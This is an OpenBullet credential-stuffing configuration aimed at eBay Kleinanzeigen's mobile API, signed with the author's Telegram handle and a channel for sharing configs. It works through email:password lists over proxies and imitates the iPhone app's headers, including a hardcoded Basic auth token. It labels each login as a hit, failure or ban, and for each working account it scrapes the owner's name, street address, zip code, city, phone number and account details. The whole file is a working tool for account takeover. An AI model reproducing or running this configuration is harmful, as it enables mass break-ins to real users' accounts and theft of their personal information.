[SETTINGS]
{
  "Name": "ebay-kleinanzeigen",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-03-10T00:43:00.2672643+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@wanted_boy",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
var rnd = uuidv4();
END SCRIPT -> VARS "rnd"

#urnd FUNCTION ToUppercase "<rnd>" -> VAR "urnd" 

#PS FUNCTION Hash SHA1 "<PASS>" -> VAR "PS" 

#password UTILITY Conversion HEX BASE64 "<PS>" -> VAR "password" 

#Login REQUEST GET "https://api.ebay-kleinanzeigen.de/api/users/login" 
  
  HEADER "Host: api.ebay-kleinanzeigen.de" 
  HEADER "Connection: keep-alive" 
  HEADER "X-ECG-USER-AGENT: ebayk-iphone-app-112018" 
  HEADER "X-ECG-VER: 1.16" 
  HEADER "X-EBAYK-APP: <urnd>" 
  HEADER "X-ECG-Authorization-User: email=\"<USER>\", password=\"<password>\"" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Kleinanzeigen/13.8.0 (iPhone; iOS 15.1; Scale/3.00)" 
  HEADER "Authorization: Basic aXBob25lOmc0Wmk5cTEw" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Unknown user and/or incorrect password Authentication failure" 
    KEY "<RESPONSECODE>" EqualTo "401" 
  KEYCHAIN Success OR 
    KEY "<HEADERS(X-EBAYK-USERID)>" Exists 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" MatchesRegex "503|502" 

#Get REQUEST GET "https://api.ebay-kleinanzeigen.de/api/users/<HEADERS(X-EBAYK-USERID)>/profile" 
  
  HEADER "Host: api.ebay-kleinanzeigen.de" 
  HEADER "Connection: keep-alive" 
  HEADER "X-ECG-USER-AGENT: ebayk-iphone-app-112018" 
  HEADER "X-ECG-VER: 1.16" 
  HEADER "X-EBAYK-APP: <urnd>" 
  HEADER "X-ECG-Authorization-User: email=\"<USER>\", token=\"<HEADERS(X-EBAYK-TOKEN)>\"" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Kleinanzeigen/13.8.0 (iPhone; iOS 15.1; Scale/2.00)" 
  HEADER "Authorization: Basic aXBob25lOmc0Wmk5cTEw" 

#accountType PARSE "<SOURCE>" JSON "accountType" CreateEmpty=FALSE -> CAP "accountType" 

#userSince PARSE "<SOURCE>" JSON "userSince" CreateEmpty=FALSE -> CAP "userSince" 

#address PARSE "<SOURCE>" JSON "preferences.address.location.name" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "address" 

#firstName PARSE "<SOURCE>" JSON "preferences.invoice.firstName" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "firstName" 

#lastName PARSE "<SOURCE>" JSON "preferences.invoice.lastName" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "lastName" 

#street PARSE "<SOURCE>" JSON "preferences.invoice.street" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "street" 

#zipCode PARSE "<SOURCE>" JSON "preferences.invoice.zipCode" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "zipCode" 

#city PARSE "<SOURCE>" JSON "preferences.invoice.city" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "city" 

#phoneNumber PARSE "<SOURCE>" JSON "phoneNumber" CreateEmpty=FALSE -> CAP "phoneNumber" 

#contactName PARSE "<SOURCE>" JSON "contactName" CreateEmpty=FALSE -> CAP "contactName" 

#onlineAds PARSE "<SOURCE>" JSON "onlineAds" CreateEmpty=FALSE -> CAP "onlineAds" 

#followers PARSE "<SOURCE>" JSON "counters.followers" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "followers" 

SET CAP "Author Telegram" "@wanted_boy"
SET CAP "Telegram Channel" "https://t.me/OpenBulletConfigs"

